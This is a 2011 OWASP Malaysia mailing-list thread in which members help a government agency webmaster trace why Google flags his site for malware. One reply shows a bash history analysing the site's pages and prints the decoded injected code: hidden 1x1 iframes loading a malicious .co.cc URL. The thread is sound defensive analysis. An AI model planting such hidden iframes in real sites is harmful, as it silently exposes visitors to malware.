[Owasp-Malaysia] Malware Detected!

Sharuzzaman Ahmat Raslan sharuzzaman at gmail.com
Tue Feb 8 04:56:27 EST 2011


I can see 2 interesting apps/scripts:

1. mamp
2. /opt/analysis/js/js

care to share? hopefully it is open source ;)


On Tue, Feb 8, 2011 at 5:50 PM, Adnan bin Mohd Shukor <adnan.shukor at gmail.com> wrote:

> Here is my bash history:
>
> xanda:tmp adnan$ history
> <snip>
>  500  cd /tmp
>  501  wget http:/www2.pkink.gov.my/indexsedc.php
>  502  wget http://www2.pkink.gov.my/indexsedc.php
>  503  nano indexsedc.php
>  504  wget http://www2.pkink.gov.my/indexsedc.php
>  505  mamp indexsedc.php.1
>  506  nano indexsedc.php.1
>  507  wget http://www2.pkink.gov.my/sedc.php
>  508  nano sedc.php
>  509  wget http://www2.pkink.gov.my/default.php
>  510  nano default.php
>  511  nano default.php
>  512  clear
> <I've removed the tags and left clean JavaScript inside>
>  513  mv default.php default.txt
>  514  /opt/analysis/js/js < default.txt
>  515  cat write.log
>  516  history
> xanda:tmp adnan$
>
> Below is the output of the cat:
> [output]
> xanda:tmp adnan$ cat write.log
> <iframe width="1" height="1"
> src="http://asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA==
> "></iframe>"<iframe
> width="1" height="1"
> src="http://asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA==
> "></iframe>"
> [/output]
>
>
> Hint: you might use a modified version of SpiderMonkey to 'understand'
> the JavaScript
>
> Thanks
>
> On 8 February 2011 17:38, Mohd Syamsuri <msyamsuri at gmail.com> wrote:
> > Thanks for the info.
> > I will check all the files.
> >
> > How did you find it?
> >
> > On Tue, Feb 8, 2011 at 5:21 PM, Adnan bin Mohd Shukor
> > <adnan.shukor at gmail.com> wrote:
> >>
> >> Here is the flow:
> >>
> >> 1) your indexsedc.php has an iframe to sedc.php
> >> 2) and your sedc.php has an iframe to default.php
> >> 3) and in default.php (look at the last 2 lines), javascript will
> >> actually create an iframe to
> >> asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA==
> >>
> >> thanks :)
> >>
> >> On 8 February 2011 17:07, Mohd Syamsuri <msyamsuri at gmail.com> wrote:
> >> > can you point...
> >> > my index.htm or indexsedc.php or other file?
> >> >
> >> > On Tue, Feb 8, 2011 at 4:19 PM, Adnan bin Mohd Shukor
> >> > <adnan.shukor at gmail.com> wrote:
> >> >>
> >> >> you have iframe pointed to
> >> >> asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA==
> >> >>
> >> >> which is not xss :)
> >> >>
> >> >> From my personal point of view, it's either caused by:
> >> >> 1) malware on pc which has been used for ftp/access to the server
> >> >> 2) compromised server
> >> >>
> >> >> you can send your access.log to cyber999 at cybersecurity.my or
> >> >> mycert at mycert.org.my for further analysis :)
> >> >>
> >> >> thanks
> >> >>
> >> >> On 8 February 2011 16:00, Mohd Syamsuri <msyamsuri at gmail.com> wrote:
> >> >> > I have checked it.
> >> >> > On Tue, Feb 8, 2011 at 3:49 PM, Rasta Boy <rastaboyz at gmail.com>
> >> >> > wrote:
> >> >> >>
> >> >> >> Hi Mohd Syamsuri,
> >> >> >>
> >> >> >> Why don't you check on the reason why it's being blocked, it might
> >> >> >> help.
> >> >> >>
> >> >> >> http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-US&site=http://www.pkink.gov.my/
> >> >> >>
> >> >> >> http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-US&site=AS:4788
> >> >> >>
> >> >> >> Regards,
> >> >> >> Kishur
> >> >> >>
> >> >> >>
> >> >> >>
> >> >> >> On Tue, Feb 8, 2011 at 3:19 PM, Mohd Syamsuri <msyamsuri at gmail.com> wrote:
> >> >> >>>
> >> >> >>> Assalamualaikum and good day to my fellow friends.
> >> >> >>> I need some advice.
> >> >> >>> The web site of Perbadanan Kemajuan Iktisad Negeri Kelantan
> >> >> >>> (http://www.pkink.gov.my) has been blocked by Google for almost 4
> >> >> >>> days.
> >> >> >>> It says that we host malware on our server: "Malware Detected!"
> >> >> >>> (Google said that!!)
> >> >> >>> What I did is:
> >> >> >>> 1. Scan all the data and upload new data
> >> >> >>> 2. Check the index.html or index.php
> >> >> >>> 3. Scan using the web scanners at
> >> >> >>> http://www.avgthreatlabs.com/
> >> >> >>> http://www.virustotal.com
> >> >> >>> but it still gets blocked.
> >> >> >>> Google said: Suspected injected code
> >> >> >>> <FRAME SRC="http://www2.pkink.gov.my/indexsedc.php"
> >> >> >>> NAME="confcontent"
> >> >> >>> scrolling=yes >
> >> >> >>> I have been using this code for almost 2 years.
> >> >> >>> What should I do now?
> >> >> >>>
> >> >> >>> --
> >> >> >>> best regard
> >> >> >>> syamsuri
> >> >> >>>
> >> >> >>>
> >> >> >>>
> >> >> >>> _______________________________________________
> >> >> >>> Owasp-Malaysia mailing list
> >> >> >>> Owasp-Malaysia at lists.owasp.org
> >> >> >>> https://lists.owasp.org/mailman/listinfo/owasp-malaysia
> >> >> >>>
> >> >> >>> OWASP Malaysia Wiki
> >> >> >>> http://www.owasp.org/index.php/Malaysia
> >> >> >>>
> >> >> >>> OWASP Malaysia Wiki Facebook
> >> >> >>> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420



-- 
Sharuzzaman Ahmat Raslan